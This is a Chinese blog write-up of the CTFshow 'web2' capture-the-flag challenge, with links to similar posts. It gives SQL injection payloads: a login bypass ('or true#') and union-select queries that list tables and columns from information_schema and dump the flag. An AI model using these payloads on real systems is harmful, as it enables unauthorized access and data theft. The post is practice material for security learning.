CTFshow_web2

Wake zero day

于 2024-07-22 00:44:53 发布

阅读量178

点赞数 3

文章标签：安全

本文链接：https://blog.csdn.net/2301_79964672/article/details/140596495

版权

弱口令失败

使用bp抓包重放

用万能密码便能登录成功，或者1' or true#，一个正确后面便可以执行

出现回显漏洞

出现回显为‘2’

数据库名为web2

username=1'or 1=1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema="web2"),3#&password=

爆破表名

发现字段名也是flag

username=1'or 1=1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema="web2" and table_name="flag"),3#&password=

username=1'or 1=1 union select 1,(select flag from web2.flag),3#&password=

爆破出flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Wake zero day

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CTFshow web入门 web2

weixin_45990644的博客

07-06

504

CTFshow web入门 web2 点开链接，发现鼠标右键无法调出快捷菜单，按F12也没用。这可能也对应了题目的“JS前台拦截”。（不懂，我猜应该是）通过手动点击浏览器开发者工具（我用的是谷歌浏览器，在浏览器关闭按钮下方的三个小点里，也可以利用浏览器开发者工具的快捷键来打开）点开后可以看到代码界面，在注释中看到flag：补充：看群主视频发现还有俩方法可以查看： 1）打开开发者页面后点击控制台左上角一个半正方形包围鼠标图标的一个按钮，选中后点击页面中的“无法查看源代码”，也会显示代码页面（有

ctfshow-WEB-web2

热门推荐

wangyuxiang946的博客

08-19

1万+

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号a' or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...

参与评论您还未登录，请先登录后发表或查看评论

ctf.show_web2

小支柱的博客

05-11

448

ctfshow靶场ctf.show_web2解题思路

ctf.show web2

qq_53319483的博客

11-16

3424

ctf.show web2

CTFshow_web入门_爆破

bilala的博客

08-19

1712

文章目录前言- - > web21- - > web22- - > web23- - > web24- - > web25- - > web26- - > web27- - > web28 前言 - - > web21 * 考点: intruder中的Custom iterator(自定义迭代器) 先下载题目所给的zip,解压后发现是本字典,那必须是本题要用到的字典了打开题目,登录,抓包将图中乱码用base64解码发现传参格式为: 账号冒号

2024年网安最全ctfshow-WEB-web3_ctfshow web3

2401_84264610的博客

05-01

php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件。很明显这个crf_go_go_go文件就是存放flag的文件。

ctfshow__黑盒测试

qq_45655564的博客

07-04

416

web380-测试url参数一开始什么也没有发现可以注入的地方，于是研究url参数。发现每个页面都带有参数，如page_1.php,page_2.php啥的。但是还是没有发现什么问题。于是看了看别人的wp，发现page.php。进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去，穿了一个page_1发现可以，于是试了一下另id=flag于是发现了flag web381-找后台进去之后发现是同样的模板，于是继续查看page.php，结果发现了这个这个想了想是没

最新发布

2401_84301227的博客

05-06

742

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

CTF SHOW web2

CTF

02-03

414

打开容器发现就两个输入框，根据提示是sql注入题目，先尝试找注入点，在用户名输入框中，先用万能注入方式尝试。用1' or 1=1#登陆成功。ctfshow{65e1afa7-d76b-4f73-b90a-0d7a3f353725}数据库名为web2，接着报表。发现返回结果为2，说明有两个表。接着查看字段名，得到字段名为flag。先看第一个表名，得到表名为flag。接着联合查询，直接爆出数据库。

ctf show web2

yystarry的博客

12-29

224

我们点击View Hint得到“通过在url头部添加view-source:” 我们可以知道，url指的是一种资源定位符号，我们看这个要我们加入的字符，他的结尾有“：”，因此我们可以知道这串字符应该在头部加入这样我们就得到了flag{cb46cd86-8f4a-4708-bb1d-55f2d8cbea1c} ...

ctfshow web2

weixin_51866363的博客

11-20

2912

ctfshow web2 writeup 这是本人第一次写blog，有不好的地方希望大家多多指出从此开始踏上了网安的不归路，成为了一只web狗从题目可以看出这是一道sql注入的题示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。首先我们尝试使用万能密码 admin 'or 1=1# **这里可以发现我们已经登陆成功了接下来我们使用联合查询来查询回显位置** 1’ or 1=1 union select 1,2,3 # 爆表 1’ or 1=1 un

ctfshow之web2

夜未至

03-21

304

本人开了一个知识星球，在星球里每天更新网络安全的文章，其中包含在安全中用到的工具和脚本，分享全国职业技能大赛的相关具体细节及解题思路，在星球中有问必答。然后在地址栏回车，就可以查看网页源代码了，获取到flag：ctfshow{42393163-8074-436c-8383-425d3bd989b6}同样也是开发人员忘记了在发布版本去掉那些注释，只不过web2里禁用了右键检查而已，查看源代码的方式还是有很多，总结：前端验证都是不安全的验证。

CTFshow Web2

Lig_HossssT的博客

10-09

459

’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库’web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...

CTF秀web2

天天学安全专属博客

11-20

1034

CTF秀web2,union注入详解

CTF-show WEB入门--web2

m0_73912575的博客

10-25

274

CTF.show WEB入门--web2 解题write up

ctfshow-web2（SQL注入）

Welcome To Myon'Blog !

10-07

771

mysql数据库、web2数据库以及其他所有数据库的所有信息都会储存在information_schema这个数据库下，这也是为什么我们可以借助information_schema这个数据库来查询到其他数据库的信息。这里说一下，因为mysql 5.0及其以上的都会自带一个叫information_schema的数据库，相当于是一个已知的数据库，并且该数据库下储存了所有数据库的所以信息。前面我们说过，information_schema这个数据库下面包含了所有数据库的所有信息。成功闭合之后先判断字段数。

ctfshow web2_故人心

10-07

ctfshow web2_故人心是一个CTF (Capture The Flag)比赛中的一个网页题目。根据提供的引用，可以看出这是一个PHP代码，其中使用了一些序列化和反序列化的操作。在代码中，如果传入的密码参数为'yu22x'，则会包含flag.php并输出flag。否则，会输出'wrong password'。